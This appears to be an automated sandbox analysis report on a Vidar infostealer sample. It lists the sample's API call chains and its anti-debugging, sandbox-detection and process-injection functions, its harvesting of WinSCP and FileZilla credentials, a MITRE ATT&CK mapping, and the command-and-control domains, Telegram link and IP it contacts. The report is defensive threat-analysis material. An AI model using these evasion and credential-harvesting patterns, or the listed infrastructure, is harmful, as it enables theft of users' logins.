                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00196013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00196013
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018B914
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00195B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00195B4D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0019547D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00189CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00189CF1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00194D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00194D08
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018CD0C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018D59B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00181D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181D80
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018B5B4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018BF22
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00195182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00195182
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190F8F GetSystemInfo,wsprintfA,0_2_00190F8F
                          Source: Amcache.hve.6.drBinary or memory string: VMware
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                          Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                          Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                          Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                          Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-20787
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-20772
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeAPI call chain: ExitProcess graph end nodegraph_0-22113
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0019D05A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00198995 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00198995
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001814AD mov eax, dword ptr fs:[00000030h]0_2_001814AD
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018148A mov eax, dword ptr fs:[00000030h]0_2_0018148A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001814A2 mov eax, dword ptr fs:[00000030h]0_2_001814A2
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001985DB mov eax, dword ptr fs:[00000030h]0_2_001985DB
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001985DC mov eax, dword ptr fs:[00000030h]0_2_001985DC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001910EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,0_2_001910EE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D05A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0019D05A
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019D9DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019D9DC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001A767E SetUnhandledExceptionFilter,0_2_001A767E

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018F51F _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_0018F51F
                          Searches for specific processes (likely to inject)
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00192554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00192554
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_0019247D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018111D cpuid 0_2_0018111D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00190DB0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001AB11C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_001AB211
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_001AB2B8
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_001A9AA0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_001AB313
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_001AAB90
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_001A5433
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_001A74EC
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_001AB4E4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_001A9DBE
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_001AE5BF
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: EnumSystemLocalesA,0_2_001AB5A6
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_001AB5D0
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_001A75C6
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_001A8E14
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_001AB637
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_001AB673
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: GetLocaleInfoA,0_2_001AE6F4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019C00B lstrcpyA,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,0_2_0019C00B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190C28 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00190C28
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00190D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00190D03
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003A6E000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: aZm1EZ2IYr.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.aZm1EZ2IYr.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aZm1EZ2IYr.exe PID: 7336, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		21
                          Process Injection                          		1
                          Masquerading                          		1
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		21
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts1
                          DLL Side-Loading                          		1
                          Virtualization/Sandbox Evasion                          		1
                          Credentials in Registry                          		161
                          Security Software Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		2
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                          Process Injection                          		Security Account Manager1
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive2
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Deobfuscate/Decode Files or Information                          		NTDS12
                          Process Discovery                          		Distributed Component Object ModelInput Capture113
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                          Obfuscated Files or Information                          		LSA Secrets1
                          Application Window Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials1
                          Account Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                          System Owner/User Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                          File and Directory Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow55
                          System Information Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          aZm1EZ2IYr.exe74%ReversingLabsWin32.Infostealer.Tinba
                          aZm1EZ2IYr.exe60%VirustotalBrowse
                          aZm1EZ2IYr.exe100%Joe Sandbox ML

                          Dropped Files

                          No Antivirus matches

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          steamcommunity.com0%VirustotalBrowse
                          t.me0%VirustotalBrowse
                          cowod.hopto.org12%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://player.vimeo.com0%URL Reputationsafe
                          http://cowod.hopto.org0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          http://cowod.hopto.org_DEBUG.zip/c0%URL Reputationsafe
                          http://cowod.hopto.0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          http://cowod.hopto0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://store.steampowered.com/;0%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                          https://store.steampowered.com/stats/0%URL Reputationsafe
                          https://medal.tv0%URL Reputationsafe
                          https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                          https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                          https://login.steampowered.com/0%URL Reputationsafe
                          http://cowod.hopto.org/0%URL Reputationsafe
                          https://recaptcha.net0%URL Reputationsafe
                          http://upx.sf.net0%URL Reputationsafe
                          https://store.steampowered.com/0%URL Reputationsafe
                          http://cowod.hopto.org/p7%VirustotalBrowse
                          https://steamcommunity.com/login/home/?goto=profiles%2F765611997866021070%VirustotalBrowse
                          https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=0%VirustotalBrowse
                          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          steamcommunity.com
                          		104.102.49.254
                          		truetrueunknown
                          t.me
                          		149.154.167.99
                          		truefalseunknown
                          cowod.hopto.org
                          		unknown
                          		unknownfalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://t.me/lpnjokefalse
                            		unknown
                            https://65.109.142.154/false
                              		unknown
